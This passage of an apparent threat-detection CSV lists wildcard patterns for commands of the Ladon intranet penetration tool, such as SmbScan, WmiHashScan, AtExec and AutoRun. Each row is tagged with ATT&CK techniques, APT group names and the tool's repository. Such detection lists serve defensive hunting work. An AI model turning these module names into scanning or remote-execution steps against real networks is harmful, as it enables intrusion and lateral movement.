T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon *.txt *","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon *DeBase64*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon *FtpScan*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon *LdapScan*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon *SMBGhost*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon *SmbHashScan*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon *SmbScan*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon *SshScan*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon *TomcatScan*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon *VncScan*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon *WebScan*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon *WinrmScan*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon *WmiHashScan*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon *WmiScan*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon ActiveAdmin*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon ActiveGuest*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon AdiDnsDump *","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon at c:*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon AtExec*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon AutoRun*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 